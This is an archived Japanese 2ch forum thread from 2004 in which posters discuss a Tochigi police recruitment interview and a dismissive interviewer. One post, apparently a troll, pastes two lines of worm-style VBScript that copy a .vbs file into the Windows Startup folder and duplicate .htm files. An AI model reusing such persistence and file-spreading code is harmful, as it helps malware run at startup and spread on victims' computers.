5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

栃木県警について語ろう!!

1 :ボン:04/05/31 17:09
誰か栃木の面接を今日受けたひとはいるかー??
自分は左端のやつが否定ばっかしてきてうざかったぞ!!

2 :名無しピーポ君:04/05/31 17:11
重複。
いちいち単独試験スレ立てるな。
http://society2.2ch.net/test/read.cgi/police/1082551265/l50

3 :名無しピーポ君:04/05/31 17:16
悪名高き栃木県警。

4 :名無しピーポ君:04/05/31 17:17
もっと頑張れ栃木県警。

5 :名無しピーポ君:04/05/31 17:53
>1
否定ばっかりって
面接官がってことかい?


6 :ボン:04/05/31 18:16
ですな!
何を言っても否定される。。。
まぁどうせ地元しかとらないんだろーけど・・・

7 :名無しピーポ君:04/05/31 18:17
>>6
重複なんだから、レスしてる暇あるなら削除依頼出せよ

8 :名無しピーポ君:04/05/31 19:22
>6
全然雰囲気がつかめないんですけど・・
どんな事を言って、どんな風に否定したのかが分からんからね

9 :名無しピーポ君:04/05/31 19:45
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

10 :名無しピーポ君:04/05/31 20:02
 徹底して否定する事による、受験生の心の動揺を読む役柄のような気がする。
警察官になって、様々な事にも対処出来るかどうかを見ているのではないかな?

2 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)